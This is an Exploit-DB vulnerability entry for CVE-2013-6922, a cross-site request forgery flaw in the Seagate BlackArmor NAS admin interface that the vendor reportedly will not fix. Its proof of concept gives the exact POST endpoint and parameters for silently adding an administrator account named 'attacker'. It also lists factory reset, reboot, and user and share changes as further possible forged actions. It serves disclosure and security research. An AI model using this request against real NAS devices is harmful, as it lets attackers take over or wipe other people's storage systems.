Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery

EDB-ID:

30726

CVE:

2013-6922

EDB Verified:

Author:

Jeroen - IT Nerdbox

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2014-01-06

Vulnerable App: 
# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery

# Google Dork: N/A

# Date: 04-01-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage: http://www.seagate.com/

# Software Link:
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

# Version: sg2000-2000.1331

# Tested on: N/A

# CVE : CVE-2013-6922

#

## Description:

#

# There are multiple CSRF attacks possible, the proof of concept shows how
it is possible to add

# a user with administrative privileges to the system.
#
# It is also possible to:

# 

# 1. Factory reset the device

# 2. Reboot the device

# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes

#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed. 

#

## Proof of Concept:

# 

# POST: http(s)://<url |
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:

#

# username attacker
# adminright yes
# fullname hacker
# userpasswd attackers_password
# userpasswdcheck attackers_password
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services